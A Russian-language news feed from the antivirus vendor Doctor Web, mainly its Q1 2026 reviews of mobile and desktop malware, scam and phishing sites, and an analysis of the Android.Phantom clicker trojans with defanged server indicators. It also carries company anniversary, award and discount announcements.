Все новости

«Доктор Веб»: обзор вирусной активности для мобильных устройств в I квартале 2026 года

Wed, 01 Apr 2026 00:00:00 GMT

1 апреля 2026 года

Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, в I квартале 2026 года продолжилось снижение активности вредоносных программ Android.MobiDash и Android.HiddenAds, демонстрирующих надоедливую рекламу. Первые обнаруживались на защищаемых устройствах на 32,70%, а вторые — на 7,09% реже по сравнению с IV кварталом минувшего года. Они уступили лидерство банковским троянам семейства Android.Banker, активность которых за последние 3 месяца увеличилась более чем в 2,5 раза. В результате те стали самыми распространенными Android-угрозами. Такие вредоносные приложения перехватывают СМС с кодами подтверждения банковских операций, демонстрируют фишинговые окна, а также могут имитировать внешний вид настоящего банковского ПО для кражи конфиденциальных данных. Пользователи чаще всего сталкивались с троянами подсемейства Android.Banker.Mamont, куда входят разнообразные вредоносные программы.

Широкое распространение (15,35% от общего числа детектирований) в I квартале получили приложения, в которые при помощи хакерских инструментов для моддинга NP Manager добавлен мусорный код с целью запутывания логики. C осени прошлого года эти инструменты активно используются в троянах семейства Android.Banker.Mamont для противодействия обнаружению антивирусами, поэтому мы предупреждаем о том, что то или иное приложение было модифицировано. Подобные программы антивирусные продукты Dr.Web детектируют как Tool.Obfuscator.TrashCode.

Другим распространенным потенциально опасным ПО, несмотря на снижение числа детектирований на 31,65%, вновь стали программы, модифицированные при помощи утилиты NP Manager (детектируются Dr.Web как Tool.NPMod). Данная утилита содержит различные модули для защиты и обфускации кода программ, а также обхода проверки их цифровой подписи после модификации. Киберпреступники используют ее для защиты вредоносного ПО с целью затруднить его обнаружение антивирусами.

Самыми распространенными нежелательными приложениями стали поддельные антивирусы Program.FakeAntiVirus, которые якобы обнаруживают угрозы и для их «лечения» требуют приобрести полную версию. Кроме того, пользователи вновь сталкивались с программами из семейств Program.FakeMoney и Program.CloudInject. Первые якобы позволяют зарабатывать на выполнении различных заданий. Вторые представляют собой ПО, модифицированное через облачный сервис CloudInject. С его помощью в приложения добавляются опасные системные разрешения и обфусцированный код, функциональность которого невозможно проконтролировать.

Среди рекламного ПО лидерами по числу детектирований стали программы-оптимизаторы Adware.Bastion.1.origin. Они периодически создают уведомления с вводящими в заблуждение сообщениями о якобы нехватке памяти и ошибках системы. Их целью является демонстрация рекламы во время «оптимизации». Другим популярным рекламным ПО были приложения Adware.Opensite.15, которые злоумышленники выдают за чит-инструменты для получения ресурсов в играх. На самом деле такие программы загружают различные сайты с объявлениями. Распространение вновь получили и программы со встроенными рекламными модулями Adware.AdPush.

В январе компания «Доктор Веб» проинформировала пользователей об Android.Phantom — новом семействе троянских приложений-кликеров. Наши вирусные аналитики выявили несколько источников распространения этих вредоносных программ. Среди них — официальный каталог приложений для устройств Xiaomi GetApps, где трояны были внедрены в ряд игр. Кроме того, киберпреступники распространяли кликеры вместе с модами популярных приложений через различные Telegram-каналы, серверы Discord, онлайн-сборники ПО и вредоносные сайты.

С помощью Android.Phantom злоумышленники накручивают рекламные клики на веб-сайтах, применяя для этого технологии машинного обучения и WebRTC — технологию передачи потоковых данных (в том числе видео) через браузер. Трояны загружают в невидимом WebView целевые интернет-ресурсы вместе с JavaScript-кодом для симуляции действий пользователя. Взаимодействие с объявлениями происходит в одном из двух режимов. Если на устройстве возможно использование WebRTC, кликеры Android.Phantom транслируют злоумышленникам виртуальный экран с загруженным сайтом, и те управляют им вручную или с использованием автоматизированной системы.

Если WebRTC недоступен, применяются автоматизированные сценарии на языке JavaScript, которые используют фреймворк TensorFlowJS. Кликеры скачивают с удаленного сервера необходимую поведенческую модель, а также JavaScript, содержащий сам фреймворк и все необходимые функции для работы модели и взаимодействия с целевыми сайтами.

В течение I квартала антивирусная лаборатория компании «Доктор Веб» зафиксировала появление новых угроз в каталоге Google Play. Среди них — множество троянских приложений Android.Joker, а также вредоносные программы Android.Subscription.23 и Android.Subscription.24. Все они созданы для подписки пользователей на платные услуги.

Главные тенденции I квартала

Банковские трояны Android.Banker стали самыми распространенными Android-угрозами
Злоумышленники стали чаще использовать инструменты для моддинга Android-программ с целью защиты банковских троянов
Продолжилось снижение активности рекламных троянов Android.MobiDash и Android.HiddenAds
Распространение троянских приложений Android.Phantom, которые используют машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах
Обнаружены новые вредоносные приложения в каталоге Google Play

По данным Dr.Web Security Space для мобильных устройств

Android.Banker.Mamont.80.origin: Банковский троян, который перехватывает СМС с одноразовыми кодами от кредитных организаций, содержимое уведомлений, а также собирает другую конфиденциальную информацию. Она включает технические данные о зараженном устройстве, список установленных приложений, информацию о СИМ-карте, телефонных звонках, поступивших и отправленных СМС.
Android.FakeApp.1600: Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.
Android.HiddenAds.675.origin: Троянская программа для показа навязчивой рекламы. Представители семейства Android.HiddenAds часто распространяются под видом безобидных приложений и, в некоторых случаях, устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.
Android.Packed.57.origin: Детектирование обфускатора, который в том числе используется для защиты вредоносных приложений (например, некоторых версий банковских троянов Android.SpyMax).
Android.Click.1812: Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.

Program.FakeAntiVirus.1: Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.
Program.FakeMoney.11: Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно вывести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.
Program.CloudInject.5
Program.CloudInject.1: Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как Tool.CloudInject). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.
Program.SnoopPhone.1.origin: Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение устройства и выполнять аудиозапись окружения.

Tool.Obfuscator.TrashCode.1
Tool.Obfuscator.TrashCode.2: Детектирование Android-программ, в которые при помощи хакерских инструментов для моддинга приложений добавлен мусорный код. Такая модификация выполняется с целью запутывания логики программ. Эта техника часто встречается в банковских троянах и в пиратских версиях ПО.
Tool.NPMod.3
Tool.NPMod.1: Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.
Tool.LuckyPatcher.2.origin: Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.

Adware.Bastion.1.origin: Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями якобы о нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».
Adware.AdPush.3.origin: Рекламный модуль, который может быть интегрирован в Android-программы. Он демонстрирует рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, этот модуль собирает ряд конфиденциальных данных, а также способен загружать другие приложения и инициировать их установку.
Adware.Opensite.15: Приложения, выдаваемые за чит-инструменты для получения ресурсов в играх. На самом деле они созданы для демонстрации рекламы. Эти программы получают с удаленного сервера конфигурацию, в соответствии с которой загружают целевой сайт с объявлениями — баннерами, всплывающими окнами, видеороликами и т. д.
Adware.Fictus.1.origin: Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений, и после установки демонстрируют нежелательную рекламу.
Adware.Airpush.7.origin: Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.

Угрозы в Google Play

В I квартале 2026 года специалисты антивирусной лаборатории «Доктор Веб» выявили в каталоге Google Play очередные вредоносные приложения Android.Joker, которые подписывают жертв на платные услуги. Трояны скрывались в ряде утилит для оптимизации работы Android-устройств, а также распространялись под видом мессенджеров, мультимедийного и другого ПО. Суммарно пользователи установили их, по меньшей мере, 370 000 раз.

Примеры вредоносных программ Android.Joker, выявленных в Google Play в I квартале 2026 года. Android.Joker.2511 был встроен в мессенджер Private Chat Message, а Android.Joker.2524 — в программу-фотокамеру Magic Camera

Кроме того, наши вирусные аналитики обнаружили вредоносные программы Android.Subscription.23 и Android.Subscription.24, также предназначенные для подключения пользователей к платным сервисам. Трояны загружают веб-сайты, на которых при помощи технологии Wap Click активируются платные мобильные подписки. На этих сайтах у пользователей запрашивается номер мобильного телефона, после чего происходит попытка автоматического подключения услуги. Оба вредоносных приложения суммарно были загружены из каталога Google Play свыше 1 500 000 раз.

Вредоносные программы Android.Subscription.23 и Android.Subscription.24 распространялись под видом приложений Stream Hive и Prime Link для управления личными финансами, однако их единственной функциональностью была загрузка сайтов для подключения владельцев Android-устройств к платным мобильным сервисам

Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.

Индикаторы компрометации

«Доктор Веб»: обзор вирусной активности в I квартале 2026 года

Wed, 01 Apr 2026 00:00:00 GMT

1 апреля 2026 года

Согласно статистике детектирований антивируса Dr.Web, в I квартале 2026 года общее число обнаруженных угроз снизилось на 6,77% по сравнению с IV кварталом прошлого года. Число уникальных угроз уменьшилось на 11,98%. Чаще всего на защищаемых устройствах обнаруживалось рекламное ПО и рекламные трояны, вредоносные программы-загрузчики, а также бэкдоры.

В почтовом трафике наиболее часто встречались вредоносные скрипты, бэкдоры и различные троянские приложения. Через электронные письма злоумышленники также распространяли фишинговые документы и эксплойты.

Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами Trojan.Encoder.35534, Trojan.Encoder.29750 и Trojan.Encoder.41868.

В I квартале 2026 года интернет-аналитики компании «Доктор Веб» выявили новые фишинговые сайты, включая поддельные ресурсы кредитных организаций и маркетплейсов, а также ряд других нежелательных сайтов.

В сегменте мобильных устройств наблюдалась возросшая активность банковских троянов. При этом наши вирусные аналитики отметили рост популярности методики защиты вредоносных программ от обнаружения антивирусным ПО, которая заключается в добавлении в них мусорного кода.

В январе эксперты «Доктор Веб» рассказали о троянах-кликерах Android.Phantom, которые используют машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах. Кроме того, в течение последних 3 месяцев мы зафиксировали появление очередных вредоносных программ в каталоге Google Play, среди которых были трояны, подписывающие пользователей на платные услуги.

Главные тенденции I квартала

Снизилось число угроз, обнаруженных на защищаемых устройствах
Среди детектируемых угроз сократилось число уникальных файлов
По сравнению с прошлым периодом наблюдения было зафиксировано меньше запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками
Продолжился рост активности банковских троянов для Android-устройств
Пользователям угрожали вредоносные программы-кликеры Android.Phantom, которые используют, в том числе, технологии машинного обучения для накрутки кликов на веб-сайтах
В каталоге Google Play были выявлены очередные вредоносные программы

По данным сервиса статистики «Доктор Веб»

Наиболее распространенные угрозы I квартала 2026 года

Trojan.Siggen31.34463: Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в %appdata%\utorrent\lib.dll. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.
Adware.Downware.20655
Adware.Downware.20766: Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.
Trojan.BPlug.4268: Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.
Adware.Siggen.33379: Поддельный браузерный блокировщик рекламы Adblock Plus, который устанавливается в систему другими вредоносными приложениями с целью показа рекламы.

Статистика вредоносных программ в почтовом трафике

Наиболее распространенные угрозы I квартала 2026 года в почтовом трафике

JS.DownLoader.1225: Эвристическое детектирование для ZIP-архивов, содержащих скрипты JavaScript с подозрительными именами.
W97M.DownLoader.2938: Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.
JS.Redirector.514: Вредоносный скрипт, перенаправляющий пользователя на подконтрольную злоумышленникам веб-страницу.

Шифровальщики

В I квартале 2026 года число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, сократилось на 31,51% по сравнению с IV кварталом минувшего года. Снижение произошло на фоне новогодних праздников и связанных с ними продолжительных выходных, в течение которых ряд киберпреступников мог приостановить активность и уйти на каникулы. При этом пользователи, которые все же пострадали от атак троянов-шифровальщиков в этот период, могли не сразу среагировать на произошедшие инциденты.

Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:

Наиболее распространенные энкодеры I квартала 2026 года

Trojan.Encoder.35534 — 15,59% обращений пользователей
Trojan.Encoder.29750 — 3,23% обращений пользователей
Trojan.Encoder.41868 — 3,23% обращений пользователей
Trojan.Encoder.26996 — 1,62% обращений пользователей
Trojan.Encoder.44383 — 1,61% обращений пользователей

Сетевое мошенничество

За минувшие 3 месяца интернет-аналитики компании «Доктор Веб» выявили ряд новых поддельных сайтов маркетплейсов. На них злоумышленники предлагают принять участие в «распродаже» якобы невыкупленных заказов. Мошенническая схема заключается в следующем: «невостребованные» товары из заказов разделены на различные категории (электроника, одежда, обувь, косметика и т. д.) и якобы собираются в соответствующие коробки-сюрпризы. Их содержимое неизвестно и может включать, в том числе, дорогие вещи. При этом такие коробки потенциальным жертвам предлагается купить за относительно невысокую стоимость, что и является главной приманкой.

Поддельный сайт маркетплейса обещает «распродажу невостребованных заказов», которые якобы переполняют склады

Когда пользователь выбирает одну из коробок, ему предлагается оформить заказ и указать персональные данные, которые могут включать имя и фамилию, номер мобильного телефона и адрес электронной почты. Затем он перенаправляется на страницу оплаты через СБП. В итоге жертва лишается денег и передает мошенникам конфиденциальные сведения.

После оформления «заказа» жертве предлагается оплатить его через Систему быстрых платежей

Наши эксперты также выявили множество сайтов сервисов, предлагающих различные финансовые услуги, например — возможность оперативного получения микрозайма, кредита или прохождения процедуры банкротства. Такие сервисы сами не предоставляют эти услуги, как того ожидают пользователи, и являются лишь посредниками между клиентами и финансовыми организациями. Они на платной основе дают доступ к подборке потенциально подходящих вариантов, в то время как агрегация подобных финансовых предложений доступна в бесплатных источниках. Более того, эти сервисы не гарантируют успешный результат при подаче заявки. В то же время, оплата доступа является не единовременной и представляет собой платную подписку с периодическим списанием денег.

Один из веб-сайтов, где доступ к сервису по подбору финансовых предложений является платным и оформляется в виде подписки

В некоторых случаях подобные ресурсы могут вводить пользователей в заблуждение, предлагая одну услугу, например — трудоустройство, но фактически предоставлять по подписке доступ к тем же финансовым предложениям по получению кредитов, микрозаймов и т. д.

Веб-сайт обещает помощь в поиске работы, но после оплаты доступа к сервису вместо списка вакансий может предоставить финансовые предложения от партнеров на получение кредита, микрозайма и т. п.

Среди выявленных в I квартале фишинговых сайтов встречались поддельные интернет-ресурсы благотворительного спортивного забега «Зеленый марафон». На них посетителям предлагается зарегистрироваться для участия в марафоне, однако эти сайты не имеют отношения к мероприятию и созданы для сбора конфиденциальных данных пользователей.

Один из поддельных сайтов забега «Зеленый марафон»

Интернет-аналитики «Доктор Веб» также выявили очередные поддельные сайты инвестиционных сервисов, якобы имеющих отношение к различным кредитным организациям. Среди них были сайты, ориентированные на аудиторию из России, Казахстана и других стран. Мошенники обещают потенциальным жертвам высокую прибыль и для «доступа» к псевдоинвестиционным платформам просят пройти короткий опрос и зарегистрировать учетную запись, указав персональную информацию.

Пример фишингового сайта, который злоумышленники выдают за официальный ресурс инвестиционного сервиса одного из российских банков

Пример фишингового сайта, который злоумышленники выдают за официальный ресурс инвестиционного сервиса одной из кредитных организаций Казахстана

Узнайте больше о нерекомендуемых антивирусом Dr.Web сайтах

Вредоносное и нежелательное ПО для мобильных устройств

По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в I квартале 2026 года продолжился рост активности банковских троянов Android.Banker, который наблюдался в IV квартале минувшего года. Наиболее распространенными среди них стали представители подсемейства Android.Banker.Mamont. В то же время вновь сократилось число детектирований рекламных троянов Android.MobiDash и Android.HiddenAds.

Среди выявленного потенциально опасного ПО лидировали программы, в которые при помощи инструментов для моддинга внедрен мусорный код (детектируются как Tool.Obfuscator.TrashCode). Такая методика в настоящее время активно применяется для защиты банковских троянов от обнаружения антивирусами. Кроме того, по-прежнему распространенными были приложения, модифицированные при помощи утилиты NP Manager (детектируются как Tool.NPMod).

Наиболее часто детектируемым нежелательным ПО стали поддельные антивирусы Program.FakeAntiVirus, которые для «лечения» якобы выявленных угроз требуют приобрести полную версию. Самым активным рекламным ПО в I квартале оказались программы Adware.Bastion.1.origin и Adware.Opensite.15. Первые представляют собой приложения-оптимизаторы, которые создают уведомления с сообщениями о якобы нехватке памяти и ошибках системы, чтобы показывать рекламу во время «оптимизации». Вторые являются поддельными чит-программами для получения различных ресурсов в играх, но в действительности лишь загружают веб-сайты с рекламой.

В январе 2026 года наша антивирусная лаборатория предупредила о троянах-кликерах Android.Phantom. Эти вредоносные приложения используют машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах. Киберпреступники распространяли их сразу несколькими способами: через каталог GetApps для устройств Xiaomi, Telegram-каналы, серверы Discord, сторонние сборники ПО и через вредоносные сайты.

В течение минувших 3 месяцев вирусные аналитики «Доктор Веб» выявили в каталоге Google Play новые угрозы, среди которых были троянские приложения Android.Joker и Android.Subscription, предназначенные для подписки пользователей на платные услуги.

Наиболее заметные события, связанные с «мобильной» безопасностью в I квартале

Банковские трояны Android.Banker стали самыми распространенными угрозами для Android-устройств
Киберпреступники чаще использовали утилиты для моддинга Android-приложений, чтобы защитить банковские трояны от обнаружения антивирусами
Продолжилась тенденция к снижению активности рекламных троянов Android.MobiDash и Android.HiddenAds
Пользователям угрожали трояны Android.Phantom, использующие машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах
В каталоге Google Play вновь распространялись вредоносные приложения

Более подробно о вирусной обстановке для мобильных устройств в I квартале 2026 года читайте в нашем обзоре.

«Доктор Веб — Центральная Азия» отмечает 20 лет работы в Казахстане

Sun, 29 Mar 2026 11:18:05 GMT

29 марта 2026 года компания «Доктор Веб — Центральная Азия» отмечает 20-летие работы в Казахстане. Мы поздравляем всех сотрудников, партнеров и клиентов с этой знаменательной датой!

В 2006 году мы открыли филиал в Казахстане. Тогда это был локальный офис продаж с технической поддержкой на местах. Прошло много лет, и мы превратились в стратегического партнера крупнейших государственных и коммерческих структур страны, а наши решения ежедневно используют сотни организаций и миллионы людей. Мы защищали от киберугроз такие важные и знаковые для Казахстана проекты, как 7-е зимние Азиатские игры 2011 года, 28-я Всемирная зимняя Универсиада 2017 года, EXPO-2017.

За 20 лет работы мы достигли впечатляющих результатов:

защитили свыше 2 000 000 устройств в Казахстане;
отразили миллионы атак;
создали 100% локальную техническую поддержку.

И это не предел. Впереди нас ждут новые вызовы и достижения, горизонты и победы. Наша миссия остается неизменной — обеспечивать спокойствие граждан и процветание бизнеса в стремительно меняющемся цифровом пространстве, а также защитить цифровой суверенитет Казахстана при любых обстоятельствах. Еще раз поздравляем всех причастных и даем слово нашим уважаемым партнерам:

С «Доктор Веб — Центральная Азия» нас связывает не просто рабочее взаимодействие, а устойчивое партнерство, которое за годы стало по-настоящему комфортным и понятным с обеих сторон.
В работе всегда чувствуется вовлеченность команды и готовность искать решения — это редкое и ценное качество.
Отдельно хочется отметить, что решения Dr.Web стабильно показывают отличные результаты в проектах наших партнеров и заслуженно пользуются доверием на рынке.
Нам важно и приятно развивать это сотрудничество, вместе усиливая позиции на рынке кибербезопасности в Казахстане.
Поздравляем с 20-летием! Пусть впереди будет еще больше сильных проектов, роста и поводов для гордости.
Маргарита Ларионова, руководитель отдела Дистрибуции ТОО «ИнфоСофтПром»

От имени нашей компании примите искренние поздравления с важной и значимой датой — 20-летием успешной работы компании «Доктор Веб — Центральная Азия» на рынке Республики Казахстан!
За эти годы ваша команда зарекомендовала себя как надежный и профессиональный партнер, вносящий весомый вклад в развитие информационной безопасности в регионе. Ваши решения и экспертиза помогают бизнесу и государственным организациям эффективно защищать свои цифровые ресурсы и уверенно двигаться вперед в условиях стремительно развивающихся технологий.
Мы высоко ценим наше многолетнее сотрудничество и уверены, что впереди нас ждет еще больше совместных достижений, новых проектов и укрепления партнерских отношений.
Желаем вашей компании дальнейшего устойчивого роста, инновационного развития, расширения присутствия на рынке и новых профессиональных побед! Пусть ваша команда и дальше достигает высоких результатов, а доверие клиентов только укрепляется.
Нугманов М.К., Вице-президент ТОО «VENDER» (AL-Style)

Для нас компания «Dr. Web — Центральная Азия» — это надежный и стратегический партнер, с которым можно уверенно развивать бизнес, реализовывать амбициозные проекты и строить долгосрочные планы.
Наше сотрудничество продолжается уже на протяжении 15 лет, и за это время мы вместе прошли значимый путь, достигнув высоких результатов. Особенно хотим отметить успешную работу в направлении обеспечения информационной безопасности и продукты «Dr.Web Enterprise Security Suite», которые зарекомендовали себя как эффективные и востребованные решения на рынке.
Благодаря совместной работе нам удалось реализовать ряд важных проектов, укрепить позиции на рынке и выстроить доверительные отношения, основанные на профессионализме и взаимной поддержке.
Мы искренне ценим наше сотрудничество и гордимся тем, что являемся частью этой 20-летней истории успеха. Ваша команда — это пример экспертизы, надежности и стремления к постоянному развитию в сфере кибербезопасности.
От всей души желаем вам дальнейшего устойчивого роста, укрепления лидерских позиций, расширения продуктового портфеля и новых значимых достижений. Пусть впереди вас ждут еще многие годы успешной работы, надежных партнерств и ярких побед!
ТОО «Comportal»

В начале 2000-х молодая российская компания «Доктор Веб» начала выходить на международные рынки, и одним из первых шагов стало открытие представительства в Казахстане. С тех пор «Доктор Веб» активно развивает бизнес в Центральной Азии, и мы рады быть частью этого пути.
Мы гордимся нашим многолетним сотрудничеством и тем, что вместе движемся вперед, адаптируясь к изменениям и открывая новые возможности для наших партнеров.
Желаем компании «Доктор Веб – Центральная Азия» процветания, устойчивого роста и многих лет успешной работы!
Команда MONT TECH Казахстан

Решение для защиты персональных компьютеров Dr.Web получило награду SKD AWARDS

Tue, 24 Mar 2026 12:26:39 GMT

Решение для защиты персональных компьютеров Dr.Web Security Space в очередной раз было отмечено отраслевой премией SKD AWARDS. Dr.Web Security Space был признан лучшим в категории «Антивирусы для ПК».

Для «Доктор Веб» это уже третья подобная награда подряд. В 2023 году Dr.Web Security Space 12.0 для Windows выиграл в категории «Безопасность персональных компьютеров», в 2024 антивирусное решение для персональных компьютеров вновь было признано лучшим, а Dr.Web Mobile Engine SDK победил в категории «Антивирусные движки».

SKD AWARDS — это ежегодная премия, проводимая SKD Labs, всемирно известной независимой лабораторией тестирования и сертификации в области информационной безопасности. Неофициально эту премию называют «Оскар для продуктов кибербезопасности» и рассматривают в качестве одного из важных показателей при оценке эффективности специализированных продуктов.

В рамках премии, продукты проходят серию тестов, в ходе которых оцениваются их функциональность, производительность, технические инновации, поведение в реальных сценариях, способность обнаружения угроз и реагирование на них.

Скидка 20% в честь праздника Наурыз и 20-летия работы «Доктор Веб» в Казахстане

Fri, 20 Mar 2026 10:00:29 GMT

29 марта исполняется 20 лет нашей работы в Казахстане. В честь дня рождения компании, а также весеннего праздника Наурыз мы запустили акцию — скидка 20% на продукты Dr.Web для персонального использования.

Скидка распространяется на продукты:

Dr.Web Security Space,
Dr.Web Security Space для мобильных устройств,
Dr.Web Katana,
Dr.Web Family Security.

Срок проведения акции: с 20 по 30 марта 2026 года включительно.
Успейте воспользоваться выгодным предложением и подарить себе и своим близким надежную защиту в цифровом пространстве!

Купить со скидкой

Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов

Wed, 21 Jan 2026 05:00:00 GMT

21 января 2026 года

Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера hxxps[:]//dllpgd[.]click, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.

Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.

Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (>34 тыс. скачиваний), Amazing Unicorn Party (>13 тыс. скачиваний), Академия мечты Сакура (>4 тыс. скачиваний), Theft Auto Mafia (>61 тыс. скачиваний), Open World Gangsters (>11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.

В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян Android.Phantom.2.origin. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).

В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера hxxps[:]//playstations[.]click загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com в директорию приложения. В сценариях для работы с некоторыми видами рекламы Android.Phantom.2.origin размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.

В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый hxxps[:]//dllpgd[.]click выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от hxxps[:]//playstations[.]click. Далее Android.Phantom.2.origin тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.

15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к Android.Phantom.2.origin в них встроили модуль Android.Phantom.5. Он является дроппером, который содержит внутри себя загрузчик удаленного кода Android.Phantom.4.origin. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера Android.Phantom.2.origin — они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.

Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения Android.Phantom.5, троян Android.Phantom.2.origin получил возможность использовать загрузчик удаленного кода Android.Phantom.4.origin для загрузки необходимой библиотеки.

Злоумышленники используют также и другие каналы распространения троянов Android.Phantom.2.origin и Android.Phantom.5. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:

Сайт Spotify Plus

Сайт Spotify Pro

И в специальных телеграм-каналах:

Spotify Pro
(54 400 подписчиков)

Spotify Plus – Official
(15 057 подписчиков)

Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат Android.Phantom.2.origin и библиотеку для организации связи по стандарту WebRTC под Android.

Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:

Сайт Apkmody

Сайт Moddroid

Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства Android.Phantom. Приложения на этих двух сайтах загружаются с одного CDN-сервера hxxps[:]//cdn[.]topmongo[.]com. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:

Moddroid.com
(87 653 подписчика)

Apkmody Chat
(6 297 подписчиков)

Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.

Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.

